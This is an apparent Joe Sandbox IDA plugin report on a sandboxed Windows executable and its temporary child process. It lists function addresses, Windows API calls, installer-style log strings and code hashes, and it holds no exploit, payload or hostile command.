Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: u
API String ID: 730355536-1051851173
Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103
h's, xrefs: 004030F3

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@$h's
API String ID: 2123368496-2243544945
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC

Strings

)q@, xrefs: 00406F3F, 00406E98, 00406EA8, 00406F04, 00406F28, 00406F18, 00406EEF

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: QueryValue
String ID: )q@
API String ID: 3660427363-2284170586
Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99

Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Analysis Process: wG1fFAzGfH.tmpPID: 5476, Parent PID: 4872COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	87

Executed Functions

Function 0046F68C Relevance: 79.7, APIs: 4, Strings: 41, Instructions: 956COMMON

Download Yara Rule

Strings

@, xrefs: 0046F794
Non-default bitness: 32-bit, xrefs: 0046F89F
Dest file exists., xrefs: 0046F99F
Will register the file (a type library) later., xrefs: 004704D0
Time stamp of existing file: %s, xrefs: 0046FA0F
Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
, xrefs: 0046FBB3, 0046FD84, 0046FE02
Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
Incrementing shared file count (32-bit)., xrefs: 00470562
Same time stamp. Skipping., xrefs: 0046FD39
.tmp, xrefs: 0046FF9B
Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
Incrementing shared file count (64-bit)., xrefs: 00470549
Installing the file., xrefs: 0046FEED
Will register the file (a DLL/OCX) later., xrefs: 004704DC
Installing into GAC, xrefs: 004706D1
Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
Non-default bitness: 64-bit, xrefs: 0046F893
Version of our file: (none), xrefs: 0046FAE0
Version of existing file: (none), xrefs: 0046FCDE
Time stamp of our file: %s, xrefs: 0046F97F
Couldn't read time stamp. Skipping., xrefs: 0046FD19
Dest file is protected by Windows File Protection., xrefs: 0046F8D1
Stripped read-only attribute., xrefs: 0046FEAB
P, xrefs: 0046F72A
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
Existing file is a newer version. Skipping., xrefs: 0046FBE6
Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
Uninstaller requires administrator: %s, xrefs: 00470159
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
Failed to strip read-only attribute., xrefs: 0046FEB7
Dest filename: %s, xrefs: 0046F878
InUn, xrefs: 00470129
Time stamp of existing file: (failed to read), xrefs: 0046FA1B
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
Time stamp of our file: (failed to read), xrefs: 0046F98B
-- File entry --, xrefs: 0046F6DF
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
Same version. Skipping., xrefs: 0046FCC9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$P$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 0-934948074
Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

Function 0042DFC4 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2

Strings

CheckTokenMembership, xrefs: 0042E02A
advapi32.dll, xrefs: 0042E02F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2252812187-1888249752
Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08

Function 00466ABC Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1657windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42

LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B

Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB

Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8

Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C

Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA

Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39

Part of subcall function 00493C7C: 73E9A570.USER32(00000000,?,?,?), ref: 00493C9E
Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
Part of subcall function 00493C7C: 73E9A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15

Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0219D870,0219F4C4,?,?,0219F4F4,?,?,0219F544,?), ref: 00467B3B
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64

Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082

Strings

STOPIMAGE, xrefs: 00466E80
(Default), xrefs: 0046814D
, xrefs: 00466F4D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
String ID: $(Default)$STOPIMAGE
API String ID: 3271511185-770201673
Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A

Function 00473F08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C

Strings

unins, xrefs: 00473FB4
unins???.*, xrefs: 00473F4B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58

Function 004520C0 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598

Function 0046D118 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F

Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED

Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94

Function 00454AB8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 00454ACE

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A

Function 0042F394 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

